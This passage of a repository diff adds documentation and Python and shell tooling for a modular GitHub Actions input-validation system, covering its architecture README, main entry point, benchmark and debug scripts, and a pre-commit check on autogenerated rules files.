- [ ] Handle error propagation from sub-validators
- [ ] Run linting: `make lint-python`
- [ ] Run tests: `make test-python`
- [ ] Generate tests: `make generate-tests`
## Getting Help
1. **Check existing validators** for similar patterns
2. **Run tests** to verify your implementation
3. **Use debugging** to trace validation flow
4. **Review API documentation** for method signatures
5. **Check test files** for usage examples
## Next Steps
After creating your validator:
1. **Update action rules**: Run `make update-validators`
2. **Test with real action**: Use the validator with your GitHub Action
3. **Document special rules**: Add to action's README
4. **Monitor for issues**: Check GitHub Actions logs for validation errors

351
validate-inputs/docs/README_ARCHITECTURE.md Normal file
View File

@@ -0,0 +1,351 @@
# Validate Inputs - Modular Validation System
A comprehensive, modular validation system for GitHub Actions inputs with automatic convention-based detection, custom validator support, and extensive testing capabilities.
## Features
- 🔍 **Automatic Validation** - Convention-based input detection
- 🧩 **Modular Architecture** - 11+ specialized validators
- 🛡️ **Security First** - Injection and traversal protection
- 🎯 **Custom Validators** - Action-specific validation logic
- 🧪 **Test Generation** - Automatic test scaffolding
- 📊 **Performance Tools** - Benchmarking and profiling
- 🐛 **Debug Utilities** - Troubleshooting helpers
## Quick Start
### Using in Your Action
```yaml
# In your action.yml
runs:
using: composite
steps:
- name: Validate inputs
uses: ./validate-inputs
with:
action-type: ${{ github.action }}
```
### Automatic Validation
Name your inputs following conventions for automatic validation:
```yaml
inputs:
github-token: # Automatically validates token format
description: GitHub token
default: ${{ github.token }}
node-version: # Automatically validates version format
description: Node.js version
default: '18'
dry-run: # Automatically validates boolean
description: Run without making changes
default: 'false'
```
## Architecture
```text
validate-inputs/
├── validators/ # Core validator modules
│ ├── base.py # Abstract base class
│ ├── registry.py # Dynamic validator discovery
│ ├── conventions.py # Pattern-based matching
│ ├── boolean.py # Boolean validation
│ ├── version.py # Version validation (SemVer/CalVer)
│ ├── token.py # Token validation
│ ├── numeric.py # Numeric range validation
│ ├── file.py # File path validation
│ ├── network.py # URL/email validation
│ ├── docker.py # Docker-specific validation
│ ├── security.py # Security pattern detection
│ └── codeql.py # CodeQL validation
├── scripts/
│ ├── update-validators.py # Generate validation rules
│ ├── generate-tests.py # Generate test files
│ ├── debug-validator.py # Debug validation issues
│ └── benchmark-validator.py # Performance testing
├── docs/
│ ├── API.md # Complete API reference
│ ├── DEVELOPER_GUIDE.md # Adding new validators
│ └── ACTION_MAINTAINER.md # Using validation
├── rules/ # Auto-generated validation rules
├── tests/ # Comprehensive test suite
└── validator.py # Main entry point
```
## Core Validators
### Version Validator
- **SemVer**: `1.2.3`, `2.0.0-beta.1`
- **CalVer**: `2024.3.15`, `24.03`
- **Flexible**: Accepts both formats
### Token Validator
- **GitHub**: `ghp_*`, `github_pat_*`, `${{ secrets.GITHUB_TOKEN }}`
- **NPM**: UUID format
- **Docker**: Any non-empty value
### Boolean Validator
- **Accepted**: `true`, `false` (case-insensitive)
- **Rejected**: `yes`, `no`, `1`, `0`
### Numeric Validator
- **Ranges**: `0-100`, `1-10`, `1-128`
- **Types**: Integers only by default
### File Validator
- **Security**: No path traversal (`../`)
- **Paths**: Relative paths only
- **Extensions**: Validates common file types
### Network Validator
- **URLs**: HTTP/HTTPS validation
- **Emails**: RFC-compliant
- **Hostnames**: Valid DNS names
- **IPs**: IPv4 and IPv6
### Docker Validator
- **Images**: Lowercase, valid characters
- **Tags**: Alphanumeric with `-`, `_`, `.`
- **Platforms**: `linux/amd64`, `linux/arm64`, etc.
- **Registries**: Known registries validation
### Security Validator
- **Injection**: Command, SQL, script detection
- **Traversal**: Path traversal prevention
- **Secrets**: API key and password detection
## Convention Patterns
The system automatically detects validation types based on input names:
| Pattern | Validator | Examples |
|----------------------|------------------|-------------------------------|
| `*-token` | TokenValidator | `github-token`, `api-token` |
| `*-version` | VersionValidator | `node-version`, `go-version` |
| `dry-run`, `debug` | BooleanValidator | `dry-run`, `verbose` |
| `max-*`, `*-limit` | NumericValidator | `max-retries`, `rate-limit` |
| `*-file`, `*-path` | FileValidator | `config-file`, `output-path` |
| `*-url`, `webhook-*` | NetworkValidator | `api-url`, `webhook-endpoint` |
| `dockerfile` | FileValidator | `dockerfile` |
| `image-*`, `tag` | DockerValidator | `image-name`, `tag` |
## Custom Validators
Create action-specific validation logic:
```python
# my-action/CustomValidator.py
from pathlib import Path
import sys
validate_inputs_path = Path(__file__).parent.parent / "validate-inputs"
sys.path.insert(0, str(validate_inputs_path))
from validators.base import BaseValidator
class CustomValidator(BaseValidator):
def validate_inputs(self, inputs: dict[str, str]) -> bool:
# Custom validation logic
return True
def get_required_inputs(self) -> list[str]:
return ["required-field"]
```
## Development Tools
### Generate Validation Rules
```bash
# Update all action rules
make update-validators
# Update specific action
python3 validate-inputs/scripts/update-validators.py --action my-action
```
### Generate Tests
```bash
# Generate missing tests
make generate-tests
# Preview changes
make generate-tests-dry
```
### Debug Validation
```bash
# Test specific inputs
./validate-inputs/scripts/debug-validator.py \
--action docker-build \
--input "image-name=myapp" \
--input "tag=v1.0.0"
# Test input matching
./validate-inputs/scripts/debug-validator.py \
--test-matching github-token node-version dry-run
# List available validators
./validate-inputs/scripts/debug-validator.py --list-validators
```
### Performance Testing
```bash
# Benchmark specific action
./validate-inputs/scripts/benchmark-validator.py \
--action docker-build \
--inputs 20 \
--iterations 1000
# Compare validators
./validate-inputs/scripts/benchmark-validator.py --compare
# Profile for bottlenecks
./validate-inputs/scripts/benchmark-validator.py \
--profile docker-build
```
## Testing
```bash
# Run all tests
make test
# Run Python tests only
make test-python
# Run specific test
uv run pytest validate-inputs/tests/test_version_validator.py
# Run with coverage
make test-python-coverage
```
## Documentation
- **[API Reference](API.md)** - Complete validator API documentation
- **[Developer Guide](DEVELOPER_GUIDE.md)** - Adding new validators
- **[Action Maintainer Guide](ACTION_MAINTAINER.md)** - Using validation in actions
## Best Practices
1. **Use Conventions** - Name inputs to trigger automatic validation
2. **Allow Expressions** - Always support `${{ }}` GitHub expressions
3. **Clear Errors** - Provide actionable error messages
4. **Test Thoroughly** - Test valid, invalid, and edge cases
5. **Document Rules** - Document validation in action README
6. **Performance** - Keep validation fast (< 10ms typical)
## Examples
### Complete Action with Validation
```yaml
name: Deploy Application
description: Deploy application with validation
inputs:
environment:
description: Deployment environment
required: true
github-token:
description: GitHub token for API access
default: ${{ github.token }}
node-version:
description: Node.js version
default: '18'
dry-run:
description: Preview changes without deploying
default: 'false'
runs:
using: composite
steps:
# Validate all inputs
- uses: ./validate-inputs
with:
action-type: deploy-application
# Setup Node.js
- uses: actions/setup-node@v4
with:
node-version: ${{ inputs.node-version }}
# Deploy application
- run: |
if [[ "${{ inputs.dry-run }}" == "true" ]]; then
echo "DRY RUN: Would deploy to ${{ inputs.environment }}"
else
./deploy.sh --env "${{ inputs.environment }}"
fi
shell: bash
```
### Custom Validator Example
```python
# deploy-application/CustomValidator.py
class CustomValidator(BaseValidator):
def validate_inputs(self, inputs: dict[str, str]) -> bool:
valid = True
# Validate environment
if inputs.get("environment"):
valid_envs = ["dev", "staging", "prod"]
if inputs["environment"] not in valid_envs:
self.add_error(
f"Invalid environment: {inputs['environment']}. "
f"Must be one of: {', '.join(valid_envs)}"
)
valid = False
# Production requires explicit token
if inputs.get("environment") == "prod":
if not inputs.get("github-token"):
self.add_error("Production deployments require github-token")
valid = False
return valid
def get_required_inputs(self) -> list[str]:
return ["environment"]
```
## Quality Metrics
- **Test Coverage**: 100% (303 tests)
- **Validators**: 11 core + unlimited custom
- **Performance**: < 10ms typical validation time
- **Zero Dependencies**: Uses only Python stdlib + PyYAML
- **Production Ready**: Zero defects policy
## Contributing
1. Create new validator in `validators/` directory
2. Add convention patterns to `conventions.py`
3. Write comprehensive tests
4. Update documentation
5. Run `make all` to verify
## License
Part of ivuorinen/actions - see repository license.

88
validate-inputs/modular_validator.py Executable file
View File

@@ -0,0 +1,88 @@
#!/usr/bin/env python
"""Modular GitHub Actions Input Validator.
This is the new entry point that uses the modular validation system.
It maintains backward compatibility while leveraging the new architecture.
"""
from __future__ import annotations
import logging
import os
from pathlib import Path
import sys
# Add validators module to path
sys.path.insert(0, str(Path(__file__).parent))
from validators.registry import get_validator # pylint: disable=wrong-import-position
# Configure logging for GitHub Actions
logging.basicConfig(
format="%(message)s",
level=logging.INFO,
)
logger = logging.getLogger(__name__)
def main() -> None:
"""Main execution for GitHub Actions validation."""
try:
# Get action type from environment
action_type = os.getenv("INPUT_ACTION_TYPE", "").strip()
if not action_type:
logger.error("::error::action-type is required but not provided")
output_path = Path(os.environ["GITHUB_OUTPUT"])
with output_path.open("a", encoding="utf-8") as f:
f.write("status=failure\n")
f.write("error=action-type is required\n")
sys.exit(1)
# Convert to underscore format for consistency
action_type = action_type.replace("-", "_")
# Get validator for this action type
# This will either load a custom validator or fall back to convention-based
validator = get_validator(action_type)
# Extract input environment variables
inputs = {}
for key, value in os.environ.items():
if key.startswith("INPUT_") and key != "INPUT_ACTION_TYPE":
# Create both underscore and dash versions
underscore_name = key[6:].lower()
inputs[underscore_name] = value
# Also create dash version for compatibility
if "_" in underscore_name:
dash_name = underscore_name.replace("_", "-")
inputs[dash_name] = value
# Validate inputs
output_path = Path(os.environ["GITHUB_OUTPUT"])
if validator.validate_inputs(inputs):
logger.info("::notice::All input validation checks passed")
with output_path.open("a", encoding="utf-8") as f:
f.write("status=success\n")
else:
logger.error("::error::Input validation failed")
for error in validator.errors:
logger.error("::error::%s", error)
with output_path.open("a", encoding="utf-8") as f:
f.write("status=failure\n")
f.write(f"error={'; '.join(validator.errors)}\n")
sys.exit(1)
except (ValueError, RuntimeError, KeyError, OSError):
logger.exception("::error::Validation script error")
github_output = os.environ.get("GITHUB_OUTPUT", "")
output_path = Path(github_output) if github_output else Path.home() / "github_output"
with output_path.open("a", encoding="utf-8") as f:
f.write("status=failure\n")
f.write("error=Validation script error\n")
sys.exit(1)
if __name__ == "__main__":
main()

429
validate-inputs/scripts/benchmark-validator.py Executable file
View File

@@ -0,0 +1,429 @@
#!/usr/bin/env python3
"""Performance benchmarking tool for validators.
Measures validation performance and identifies bottlenecks.
"""
from __future__ import annotations
import argparse
import json
from pathlib import Path
import statistics
import sys
import time
from typing import Any
# Add parent directory to path for imports
sys.path.insert(0, str(Path(__file__).parent.parent))
from validators.registry import ValidatorRegistry
class ValidatorBenchmark:
"""Benchmark utility for validators."""
def __init__(self, iterations: int = 100) -> None:
"""Initialize the benchmark tool.
Args:
iterations: Number of iterations for each test
"""
self.iterations = iterations
self.registry = ValidatorRegistry()
self.results: dict[str, list[float]] = {}
def benchmark_action(
self,
action_type: str,
inputs: dict[str, str],
iterations: int | None = None,
) -> dict[str, Any]:
"""Benchmark validation for an action.
Args:
action_type: The action type to validate
inputs: Dictionary of inputs to validate
iterations: Number of iterations (overrides default)
Returns:
Benchmark results dictionary
"""
iterations = iterations or self.iterations
times = []
# Get the validator once (to exclude loading time)
validator = self.registry.get_validator(action_type)
print(f"\nBenchmarking {action_type} with {len(inputs)} inputs...")
print(f"Running {iterations} iterations...")
# Warm-up run
validator.clear_errors()
result = validator.validate_inputs(inputs)
# Benchmark runs
for i in range(iterations):
validator.clear_errors()
start = time.perf_counter()
result = validator.validate_inputs(inputs)
end = time.perf_counter()
times.append(end - start)
if (i + 1) % 10 == 0:
print(f" Progress: {i + 1}/{iterations}", end="\r")
print(f" Completed: {iterations}/{iterations}")
# Calculate statistics
stats = self._calculate_stats(times)
stats["action_type"] = action_type
stats["validator"] = validator.__class__.__name__
stats["input_count"] = len(inputs)
stats["iterations"] = iterations
stats["validation_result"] = result
stats["errors"] = len(validator.errors)
return stats
def _calculate_stats(self, times: list[float]) -> dict[str, Any]:
"""Calculate statistics from timing data.
Args:
times: List of execution times
Returns:
Statistics dictionary
"""
times_ms = [t * 1000 for t in times] # Convert to milliseconds
return {
"min_ms": min(times_ms),
"max_ms": max(times_ms),
"mean_ms": statistics.mean(times_ms),
"median_ms": statistics.median(times_ms),
"stdev_ms": statistics.stdev(times_ms) if len(times_ms) > 1 else 0,
"total_s": sum(times),
"per_second": len(times) / sum(times) if sum(times) > 0 else 0,
}
def compare_validators(self, test_cases: list[dict[str, Any]]) -> None:
"""Compare performance across multiple validators.
Args:
test_cases: List of test cases with action_type and inputs
"""
results = []
print("\n" + "=" * 70)
print("Validator Performance Comparison")
print("=" * 70)
for case in test_cases:
stats = self.benchmark_action(case["action_type"], case["inputs"])
results.append(stats)
# Display comparison table
self._display_comparison(results)
def _display_comparison(self, results: list[dict[str, Any]]) -> None:
"""Display comparison table of benchmark results.
Args:
results: List of benchmark results
"""
print("\nResults Summary:")
print("-" * 70)
print(
f"{'Action':<20} {'Validator':<20} {'Inputs':<8} {'Mean (ms)':<12} {'Ops/sec':<10}",
)
print("-" * 70)
for r in results:
print(
f"{r['action_type']:<20} "
f"{r['validator']:<20} "
f"{r['input_count']:<8} "
f"{r['mean_ms']:<12.3f} "
f"{r['per_second']:<10.1f}",
)
print("\nDetailed Statistics:")
print("-" * 70)
for r in results:
print(f"\n{r['action_type']} ({r['validator']}):")
print(f" Min: {r['min_ms']:.3f} ms")
print(f" Max: {r['max_ms']:.3f} ms")
print(f" Mean: {r['mean_ms']:.3f} ms")
print(f" Median: {r['median_ms']:.3f} ms")
print(f" StdDev: {r['stdev_ms']:.3f} ms")
print(f" Validation Result: {'PASS' if r['validation_result'] else 'FAIL'}")
if r["errors"] > 0:
print(f" Errors: {r['errors']}")
def profile_validator(self, action_type: str, inputs: dict[str, str]) -> None:
"""Profile a validator to identify bottlenecks.
Args:
action_type: The action type to validate
inputs: Dictionary of inputs to validate
"""
import cProfile
from io import StringIO
import pstats
print(f"\nProfiling {action_type} validator...")
print("-" * 70)
validator = self.registry.get_validator(action_type)
# Create profiler
profiler = cProfile.Profile()
# Profile the validation
profiler.enable()
for _ in range(10): # Run multiple times for better data
validator.clear_errors()
validator.validate_inputs(inputs)
profiler.disable()
# Print statistics
stream = StringIO()
stats = pstats.Stats(profiler, stream=stream)
stats.strip_dirs()
stats.sort_stats("cumulative")
stats.print_stats(20) # Top 20 functions
print(stream.getvalue())
def benchmark_patterns(self) -> None:
"""Benchmark pattern matching for convention-based validation."""
from validators.conventions import ConventionBasedValidator
print("\n" + "=" * 70)
print("Pattern Matching Performance")
print("=" * 70)
validator = ConventionBasedValidator("test")
# Access the internal pattern mapping
mapper = getattr(validator, "_convention_mapper", None)
if not mapper:
print("Convention mapper not available")
return
# Test inputs with different pattern types
test_inputs = {
# Exact matches
"dry-run": "true",
"verbose": "false",
"debug": "true",
# Prefix matches
"github-token": "ghp_xxx",
"npm-token": "xxx",
"api-token": "xxx",
# Suffix matches
"node-version": "18.0.0",
"python-version": "3.9",
# Contains matches
"webhook-url": "https://example.com",
"api-url": "https://api.example.com",
# No matches
"custom-field-1": "value1",
"custom-field-2": "value2",
"custom-field-3": "value3",
}
times = []
for _ in range(self.iterations):
start = time.perf_counter()
for name in test_inputs:
mapper.get_validator_type(name)
end = time.perf_counter()
times.append(end - start)
stats = self._calculate_stats(times)
print(f"\nPattern matching for {len(test_inputs)} inputs:")
print(f" Mean: {stats['mean_ms']:.3f} ms")
print(f" Median: {stats['median_ms']:.3f} ms")
print(f" Min: {stats['min_ms']:.3f} ms")
print(f" Max: {stats['max_ms']:.3f} ms")
print(f" Lookups/sec: {len(test_inputs) * self.iterations / stats['total_s']:.0f}")
def save_results(self, results: dict[str, Any], filepath: Path) -> None:
"""Save benchmark results to file.
Args:
results: Benchmark results
filepath: Path to save results
"""
with filepath.open("w") as f:
json.dump(results, f, indent=2)
print(f"\nResults saved to {filepath}")
def create_test_inputs(input_count: int) -> dict[str, str]:
"""Create test inputs for benchmarking.
Args:
input_count: Number of inputs to create
Returns:
Dictionary of test inputs
"""
inputs = {}
# Add various input types
patterns = [
("github-token", "${{ secrets.GITHUB_TOKEN }}"),
("node-version", "18.0.0"),
("python-version", "3.9.0"),
("dry-run", "true"),
("verbose", "false"),
("max-retries", "5"),
("rate-limit", "100"),
("config-file", "./config.yml"),
("output-path", "./output"),
("webhook-url", "https://example.com/webhook"),
("api-url", "https://api.example.com"),
("docker-image", "nginx:latest"),
("dockerfile", "Dockerfile"),
]
for i in range(input_count):
pattern = patterns[i % len(patterns)]
name = f"{pattern[0]}-{i}" if i > 0 else pattern[0]
inputs[name] = pattern[1]
return inputs
def main() -> None:
"""Main entry point for the benchmark utility."""
parser = argparse.ArgumentParser(
description="Benchmark validator performance",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# Benchmark specific action
%(prog)s --action docker-build --inputs 10
# Compare multiple validators
%(prog)s --compare
# Profile a validator
%(prog)s --profile docker-build
# Benchmark pattern matching
%(prog)s --patterns
""",
)
parser.add_argument(
"--action",
"-a",
help="Action type to benchmark",
)
parser.add_argument(
"--inputs",
"-i",
type=int,
default=10,
help="Number of inputs to test (default: 10)",
)
parser.add_argument(
"--iterations",
"-n",
type=int,
default=100,
help="Number of iterations (default: 100)",
)
parser.add_argument(
"--compare",
"-c",
action="store_true",
help="Compare multiple validators",
)
parser.add_argument(
"--profile",
"-p",
metavar="ACTION",
help="Profile a specific validator",
)
parser.add_argument(
"--patterns",
action="store_true",
help="Benchmark pattern matching",
)
parser.add_argument(
"--save",
"-s",
type=Path,
help="Save results to JSON file",
)
args = parser.parse_args()
# Create benchmark tool
benchmark = ValidatorBenchmark(iterations=args.iterations)
if args.compare:
# Compare different validators
test_cases = [
{
"action_type": "docker-build",
"inputs": create_test_inputs(args.inputs),
},
{
"action_type": "github-release",
"inputs": create_test_inputs(args.inputs),
},
{
"action_type": "test-action", # Uses convention-based
"inputs": create_test_inputs(args.inputs),
},
]
benchmark.compare_validators(test_cases)
elif args.profile:
# Profile specific validator
inputs = create_test_inputs(args.inputs)
benchmark.profile_validator(args.profile, inputs)
elif args.patterns:
# Benchmark pattern matching
benchmark.benchmark_patterns()
elif args.action:
# Benchmark specific action
inputs = create_test_inputs(args.inputs)
results = benchmark.benchmark_action(args.action, inputs)
# Display results
print("\n" + "=" * 70)
print("Benchmark Results")
print("=" * 70)
print(f"Action: {results['action_type']}")
print(f"Validator: {results['validator']}")
print(f"Inputs: {results['input_count']}")
print(f"Iterations: {results['iterations']}")
print("-" * 70)
print(f"Mean: {results['mean_ms']:.3f} ms")
print(f"Median: {results['median_ms']:.3f} ms")
print(f"Min: {results['min_ms']:.3f} ms")
print(f"Max: {results['max_ms']:.3f} ms")
print(f"StdDev: {results['stdev_ms']:.3f} ms")
print(f"Ops/sec: {results['per_second']:.1f}")
if args.save:
benchmark.save_results(results, args.save)
else:
parser.print_help()
sys.exit(1)
if __name__ == "__main__":
main()

102
validate-inputs/scripts/check-rules-not-manually-edited.sh Executable file
View File

@@ -0,0 +1,102 @@
#!/bin/sh
# Pre-commit hook to prevent manual editing of autogenerated validation rules
# This script checks if any rules files have been manually modified
set -eu
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
PROJECT_ROOT="$(cd "$SCRIPT_DIR/../.." && pwd)"
# Color codes for output
RED='\033[0;31m'
YELLOW='\033[1;33m'
GREEN='\033[0;32m'
NC='\033[0m' # No Color
# Note: RULES_DIR check removed - not used in this version
# Function to check if a file looks manually edited
check_file_manually_edited() {
file="$1"
# Check if file has the autogenerated header
if ! head -n 5 "$file" | grep -q "DO NOT EDIT MANUALLY"; then
printf '%b⚠ SUSPICIOUS: %s missing '\''DO NOT EDIT MANUALLY'\'' header%b\n' "$RED" "$file" "$NC"
return 1
fi
# Check if file has generator version
if ! grep -q "Generated by update-validators.py" "$file"; then
printf '%b⚠ SUSPICIOUS: %s missing generator attribution%b\n' "$RED" "$file" "$NC"
return 1
fi
return 0
}
# Function to check if rules are up-to-date
check_rules_up_to_date() {
printf '%b🔍 Checking if validation rules are up-to-date...%b\n' "$YELLOW" "$NC"
# Run the update script in dry-run mode
if cd "$PROJECT_ROOT" && python3 validate-inputs/scripts/update-validators.py --dry-run >/dev/null 2>&1; then
printf '%b✅ Validation rules are up-to-date%b\n' "$GREEN" "$NC"
return 0
else
printf '%b❌ Validation rules are out-of-date%b\n' "$RED" "$NC"
printf '%b💡 Run '\''make update-validators'\'' to regenerate rules%b\n' "$YELLOW" "$NC"
return 1
fi
}
# Main check function
main() {
exit_code=0
files_checked=0
printf '%b🛡 Checking autogenerated validation rules...%b\n' "$YELLOW" "$NC"
# Check all rules.yml files in action directories
# Store find results in a temp file to avoid subshell
tmpfile=$(mktemp)
find "$PROJECT_ROOT" -path "*/rules.yml" -type f 2>/dev/null > "$tmpfile"
while IFS= read -r file; do
if [ -f "$file" ]; then
files_checked=$((files_checked + 1))
if ! check_file_manually_edited "$file"; then
exit_code=1
fi
fi
done < "$tmpfile"
rm -f "$tmpfile"
if [ "$files_checked" -eq 0 ]; then
printf '%b⚠ No validation rule files found%b\n' "$YELLOW" "$NC"
return 0
fi
# Check if rules are up-to-date
if ! check_rules_up_to_date; then
exit_code=1
fi
if [ "$exit_code" -eq 0 ]; then
printf '%b✅ All %d validation rules look properly autogenerated%b\n' "$GREEN" "$files_checked" "$NC"
else
printf "\n"
printf '%b❌ VALIDATION RULES CHECK FAILED%b\n' "$RED" "$NC"
printf '%b📋 To fix these issues:%b\n' "$YELLOW" "$NC"
printf " 1. Revert any manual changes to rules files\n"
printf " 2. Run 'make update-validators' to regenerate rules\n"
printf " 3. Modify generator logic in update-validators.py if needed\n"
printf "\n"
printf '%b📖 Rules are now stored as rules.yml in each action folder%b\n' "$YELLOW" "$NC"
fi
return $exit_code
}
# Run the check
main "$@"

389
validate-inputs/scripts/debug-validator.py Executable file
View File

@@ -0,0 +1,389 @@
#!/usr/bin/env python3
"""Debug utility for testing validators.
This tool helps debug validation issues by:
- Testing validators directly with sample inputs
- Showing which validator would be used for inputs
- Tracing validation flow
- Reporting detailed error information
"""
from __future__ import annotations
import argparse
import json
import logging
from pathlib import Path
import sys
from typing import TYPE_CHECKING
# Add parent directory to path for imports
sys.path.insert(0, str(Path(__file__).parent.parent))
from validators.conventions import ConventionBasedValidator
if TYPE_CHECKING:
from validators.base import BaseValidator
from validators.registry import ValidatorRegistry
# Set up logging
logging.basicConfig(
level=logging.INFO,
format="%(levelname)-8s %(name)s: %(message)s",
)
logger = logging.getLogger("debug-validator")
class ValidatorDebugger:
"""Debugging utility for validators."""
def __init__(self, *, verbose: bool = False) -> None:
"""Initialize the debugger.
Args:
verbose: Enable verbose output
"""
self.verbose = verbose
self.registry = ValidatorRegistry()
if verbose:
logging.getLogger().setLevel(logging.DEBUG)
def debug_action(self, action_type: str, inputs: dict[str, str]) -> None:
"""Debug validation for an action.
Args:
action_type: The action type to validate
inputs: Dictionary of inputs to validate
"""
print(f"\n{'=' * 60}")
print(f"Debugging: {action_type}")
print(f"{'=' * 60}\n")
# Get the validator
print("1. Getting validator...")
validator = self.registry.get_validator(action_type)
print(f" Validator: {validator.__class__.__name__}")
print(f" Module: {validator.__class__.__module__}\n")
# Show required inputs
if hasattr(validator, "get_required_inputs"):
required = validator.get_required_inputs()
if required:
print("2. Required inputs:")
for inp in required:
status = "" if inp in inputs else ""
print(f" {status} {inp}")
print()
# Validate inputs
print("3. Validating inputs...")
result = validator.validate_inputs(inputs)
print(f" Result: {'PASS' if result else 'FAIL'}\n")
# Show errors
if validator.errors:
print("4. Validation errors:")
for i, error in enumerate(validator.errors, 1):
print(f" {i}. {error}")
print()
else:
print("4. No validation errors\n")
# Show validation details for each input
if self.verbose:
self.show_input_details(validator, inputs)
def show_input_details(self, validator: BaseValidator, inputs: dict[str, str]) -> None:
"""Show detailed validation info for each input.
Args:
validator: The validator instance
inputs: Dictionary of inputs
"""
print("5. Input validation details:")
# If it's a convention-based validator, show which validator would be used
if isinstance(validator, ConventionBasedValidator):
for input_name, value in inputs.items():
mapper = getattr(validator, "_convention_mapper", None)
validator_type = mapper.get_validator_type(input_name) if mapper else None
print(f"\n {input_name}:")
print(f" Value: {value[:50]}..." if len(value) > 50 else f" Value: {value}")
print(f" Validator: {validator_type or 'BaseValidator (default)'}")
# Try to validate individually to see specific errors
if validator_type:
# Use registry to get validator instance
sub_validator = self.registry.get_validator_by_type(validator_type)
if sub_validator:
# Clear previous errors
sub_validator.clear_errors()
# Validate based on type
valid = self._validate_single_input(
sub_validator,
validator_type,
input_name,
value,
)
print(f" Valid: {'' if valid else ''}")
if sub_validator.errors:
for error in sub_validator.errors:
print(f" Error: {error}")
print()
def _validate_single_input(
self,
validator: BaseValidator,
validator_type: str,
input_name: str,
value: str,
) -> bool:
"""Validate a single input with appropriate method.
Args:
validator: The validator instance
validator_type: Type of validator
input_name: Name of the input
value: Value to validate
Returns:
True if valid, False otherwise
"""
# Map validator types to validation methods
method_map = {
"boolean": "validate_boolean",
"version": "validate_flexible_version",
"token": "validate_github_token",
"numeric": "validate_numeric_range",
"file": "validate_file_path",
"network": "validate_url",
"docker": "validate_image_name",
"security": "validate_no_injection",
"codeql": "validate_languages",
}
method_name = method_map.get(validator_type)
if method_name and hasattr(validator, method_name):
method = getattr(validator, method_name)
# Handle methods with different signatures
if validator_type == "numeric":
# Numeric validator needs min/max values
# Try to detect from input name
if "retries" in input_name:
return method(value, 1, 10, input_name)
if "limit" in input_name or "max" in input_name:
return method(value, 0, 100, input_name)
return method(value, 0, 999999, input_name)
if validator_type == "codeql":
# CodeQL expects a list
return method([value], input_name)
# Most validators take (value, field_name)
return method(value, input_name)
# Fallback to validate_inputs
return validator.validate_inputs({input_name: value})
def test_input_matching(self, input_names: list[str]) -> None:
"""Test which validators would be used for input names.
Args:
input_names: List of input names to test
"""
print(f"\n{'=' * 60}")
print("Input Name Matching Test")
print(f"{'=' * 60}\n")
conv_validator = ConventionBasedValidator("test")
mapper = getattr(conv_validator, "_convention_mapper", None)
if not mapper:
print("Convention mapper not available")
return
print(f"{'Input Name':<30} {'Validator':<20} {'Pattern Type'}")
print("-" * 70)
for name in input_names:
validator_type = mapper.get_validator_type(name)
# Determine pattern type
pattern_type = "none"
if validator_type:
if name in mapper.PATTERNS.get("exact", {}):
pattern_type = "exact"
elif any(name.startswith(p) for p in mapper.PATTERNS.get("prefix", {})):
pattern_type = "prefix"
elif any(name.endswith(p) for p in mapper.PATTERNS.get("suffix", {})):
pattern_type = "suffix"
elif any(p in name for p in mapper.PATTERNS.get("contains", {})):
pattern_type = "contains"
validator_display = validator_type or "BaseValidator"
print(f"{name:<30} {validator_display:<20} {pattern_type}")
def validate_file(self, filepath: Path) -> None:
"""Validate inputs from a JSON file.
Args:
filepath: Path to JSON file with inputs
"""
try:
with filepath.open() as f:
data = json.load(f)
action_type = data.get("action_type", "unknown")
inputs = data.get("inputs", {})
self.debug_action(action_type, inputs)
except json.JSONDecodeError:
logger.exception("Invalid JSON in %s", filepath)
sys.exit(1)
except FileNotFoundError:
logger.exception("File not found: %s", filepath)
sys.exit(1)
def list_validators(self) -> None:
"""List all available validators."""
print(f"\n{'=' * 60}")
print("Available Validators")
print(f"{'=' * 60}\n")
# Core validators
from validators.boolean import BooleanValidator
from validators.codeql import CodeQLValidator
from validators.docker import DockerValidator
from validators.file import FileValidator
from validators.network import NetworkValidator
from validators.numeric import NumericValidator
from validators.security import SecurityValidator
from validators.token import TokenValidator
from validators.version import VersionValidator
validators = [
("BooleanValidator", BooleanValidator, "Boolean values (true/false)"),
("VersionValidator", VersionValidator, "Version strings (SemVer/CalVer)"),
("TokenValidator", TokenValidator, "Authentication tokens"),
("NumericValidator", NumericValidator, "Numeric ranges"),
("FileValidator", FileValidator, "File paths"),
("NetworkValidator", NetworkValidator, "URLs, emails, hostnames"),
("DockerValidator", DockerValidator, "Docker images, tags, platforms"),
("SecurityValidator", SecurityValidator, "Security patterns, injection"),
("CodeQLValidator", CodeQLValidator, "CodeQL languages and queries"),
]
print("Core Validators:")
for name, _cls, desc in validators:
print(f" {name:<20} - {desc}")
# Check for custom validators
print("\nCustom Validators:")
custom_found = False
for action_dir in Path().iterdir():
if action_dir.is_dir() and not action_dir.name.startswith((".", "_")):
custom_file = action_dir / "CustomValidator.py"
if custom_file.exists():
print(f" {action_dir.name:<20} - Custom validator")
custom_found = True
if not custom_found:
print(" None found")
print()
def main() -> None:
"""Main entry point for the debug utility."""
parser = argparse.ArgumentParser(
description="Debug validator for GitHub Actions inputs",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# Test specific inputs
%(prog)s --action docker-build --input "image-name=myapp" --input "tag=v1.0.0"
# Test from JSON file
%(prog)s --file test-inputs.json
# Test input name matching
%(prog)s --test-matching github-token node-version dry-run
# List available validators
%(prog)s --list-validators
""",
)
parser.add_argument(
"--action",
"-a",
help="Action type to debug",
)
parser.add_argument(
"--input",
"-i",
action="append",
help="Input in format name=value (can be repeated)",
)
parser.add_argument(
"--file",
"-f",
type=Path,
help="JSON file with action_type and inputs",
)
parser.add_argument(
"--test-matching",
"-t",
nargs="+",
help="Test which validators match input names",
)
parser.add_argument(
"--list-validators",
"-l",
action="store_true",
help="List all available validators",
)
parser.add_argument(
"--verbose",
"-v",
action="store_true",
help="Enable verbose output",
)
args = parser.parse_args()
# Create debugger
debugger = ValidatorDebugger(verbose=args.verbose)
# Handle different modes
if args.list_validators:
debugger.list_validators()
elif args.test_matching:
debugger.test_input_matching(args.test_matching)
elif args.file:
debugger.validate_file(args.file)
elif args.action and args.input:
# Parse inputs
inputs = {}
for input_str in args.input:
if "=" not in input_str:
logger.error("Invalid input format: %s (expected name=value)", input_str)
sys.exit(1)
name, value = input_str.split("=", 1)
inputs[name] = value
debugger.debug_action(args.action, inputs)
else:
parser.print_help()
sys.exit(1)
if __name__ == "__main__":
main()

912
validate-inputs/scripts/generate-tests.py Executable file
View File

@@ -0,0 +1,912 @@
#!/usr/bin/env python3
"""Test generation system for GitHub Actions and validators.
